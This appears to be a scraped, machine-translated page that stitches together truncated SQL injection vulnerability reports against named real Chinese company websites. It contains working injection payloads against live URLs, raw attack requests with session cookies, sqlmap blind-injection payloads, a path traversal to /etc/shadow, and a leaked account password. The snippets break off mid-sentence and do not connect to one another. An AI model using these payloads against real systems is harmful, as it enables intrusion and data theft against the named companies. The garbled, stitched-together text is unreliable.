scan website for sql injection vulnerabilities

Http://www.leadsec.com.cn/news/detail.aspxthe classidfilter is not fully split. SQL Injection exists on the page Http://www.leadsec.com.cn/News/Detail.aspx? RootID = 150 Aid = 1858 ClassID = 153and 1 = 1 --Http://www.leadsec.com.cn/News/Detail.aspx? RootID = 150 Aid = 1858 ClassID = 153and 1 = 2 --Database Version: Microsoft SQL Server 2000-8.00.760 (Intel X

Brief description: Xin Tong huashun Network Information Co., Ltd. provides mobile WAP access to the website for financial information access. SQL Injection exists on multiple pages.Detailed description: Databases on the SQL Injection page of the company use the MYSQL Root

A severe mysql injection vulnerability exists in the website construction system of zule activity platform. The construction system includes Mengniu sour milk and other influential websites. Among them, Mengniu sour milk database contains a large number of Sina and authorized tokens for logon by users.I thought Mengniu sour milk http://www.mnssr.com is a self-built site, background guess the background foun

Author: Monkey QQ: 812009485 I just got home from the holiday. I am idle and have nothing to do, and it's heavy snow. I don't want to go out and soak mm .. Suddenly I saw an enterprise cms, So I downloaded the program. G.cn Keyword: 6CMS enterprise Site Management System (Chinese and English Traditional Chinese Version) Default Account Password: admin Background: admin/ I don't know how the programmer got it. I can see that the admin directory of the program has an anti-

SQL injection vulnerability in a website under Zhongguancun online Zhongguancun online under a station SQL injection vulnerability http://easyxiu.zol.com.cn/H/ POST/H/action /? Act = order HTTP/1.1Content-Length: 75Content-Type: application/x-www-form-urlencodedX-Requested

SQL injection attacks are not effectively prevented. This vulnerability can directly cause leakage of company-related confidential information.Detailed Description: directly submit the SQL injection vulnerability locationHttp://www.nongfuspring.com/app/newsDetail.action? HeadtodetailId = 853Proof of vulnerability:Due t

If the website only opens port 80, you will find that the following method is more useful.The methods used are almost none I have found. I have some personal experience and skills in injection.There are four methods (currently known) Method 1: This is the method described in Take advantage of sqlserver's xp_dirtree. Okay, let's take a look at the method first, and then let's talk about its advantages and disadvantages (based on the original article) C

During the test, the dongle intercepted the SQL query on the website where the dongle was used. However, the dongle was able to bypass the security and obtain the database information. For the protection device, if important information is obtained by the passer when it is enabled, I think it has been bypassed... the test procedure is as follows: bbs.siteserver.cn installed the url of the dongle request to

SQL Injection + File Inclusion Vulnerability in a website of China Telecom Rear one: http://rs.hntelecom.net.cn/HRSystem/initIndex.doBACKGROUND Two: http://rs.hntelecom.net.cn/loginadmin.do? M = loginVulnerability Type 1:The file contains: rs.hntelecom.net.cn/filedown.do? M = filedown path = /.. /.. //.. /.. //.. /.. //.. /.. //.. /.. // etc/shadow % 00 No. root

51CTO technical website has SQL Injection Vulnerability Detailed description: POST/salary/show. php HTTP/1.1Content-Length: Your content-type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://fellow.51cto.comHost: fellow.51cto. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

Kingsoft Ciba has SQL injection in the background of a website. Kingsoft Injection of this site beforeWooYun: a management system leaked a lot of Kingsoft MAC (tftp + ftp account 30 + decrypted MD5 enters the management background)Decrypt the login with the first account posted Chenhui1 password chenhui2Log on to

Alimama travel website has SQL Injection (⊙ O ⊙ )... If a problem occurs at a point, check whether there are any problems with all similar points .... POST/lvyou/dest_index/AjaxGetTripList HTTP/1.1Content-Length: 66Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.lvmama.com/lvyou/Cookie: uid = wKgKcFZNZmCynk9 + CC

A website in CSDN has the SQL blind injection vulnerability. Http://edu.csdn.net/courses? Attr = 3 c_id = 0 level = 1 payload: blind Note 1 = 1 Parameter: level (GET) Type: boolean-based blind Title: AND boolean-based blind-WHERE or HAVING clause Payload: attr = 3 c_id = 0 level = 1 AND 2659 = 2659 Type: AND/OR time-based blind Title: MySQL> = 5.0.12 AND time

SQL Injection for an important website of Tom Online POST /redeem/tom_ecardExchange.php HTTP/1.1Content-Length: 191Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://tangyuan.tom.com/Cookie: PHPSESSID=0bfa903262d197b1a2039b9b8ef55db0; tom_test=rPcet0oDU!4!1!1459218920!1459219309!4!0!http://tangyuan.tom.com/redeem/game

The SQL injection vulnerability exists on a website of touniu tourism network. POST/ajax/membercard HTTP/1.1Content-Length: 149Content-Type: application/x-www-form-urlencodedX-Requested-With: Signature: http://passport.tuniu.comCookie: PASSPORTSESSID = signature; login_user_name = rslydfdvHost: passport. tuniu. comConnection: Keep-aliveAccept-Encoding: gzip, d

Preface: Other basic injection methods are not described in detail. Unable to understand the injection basics of this site Article . For better use of injection, we suggest you read the SQL syntax articles on this site. [Retrieve all database names]Select name from Master. DBO. sysdatabases where dbid = 7 // The v

Member/getpassword. php and admin/getpassword. php files If ($ p) {$ array = explode ('. ', base64_decode ($ p); $ SQL = "SELECT * FROM $ met_admin_table WHERE admin_id = '". $ array [0]. "'"; $ sqlarray = $ db-> get_one ($ SQL ); The base64_decode ($ p) value is separated by explode and then submitted to the $ array. Finally, $ array [0] enters the SQL query,

A second-level website has an injection, which can report errors and cross-database operations.Dbo permissionProof of vulnerability:Error injection:Http://tclub.ufida.com.cn/buyservice.asp? Money67 = 0 checkbox = 69 Money69 = 100 checkbox = 75 Money75 = 0 money = 2012-12-20 flag = shopcar shopcarflag = gwc iRemainMoney = checkbox = 63 Money63 = 0 checkbox = 65 Money65 = 0 checkbox = 66 Money66

Http://3g.admin5.com /? Appid = 330051% 27% 20and % 20 sleep % 282% 29% 3d % 27 host = admin5.com src = http://bbs.admin5.com/forum.php? Mod = viewthread tid = 10112420 http://3g.admin5.com /? Appid = 330051% 27% 20and % 20 sleep % 281% 29% 3d % 27 host = admin5.com src = http://bbs.admin5.com/forum.php? Mod = viewthread tid = 10112420 http://3g.admin5.com /? Appid = 330051% 27% 20and % 20 sleep % 280% 29% 3d % 27 host = admin5.com src = http://bbs.admin5.com/forum.php? Mod = viewthread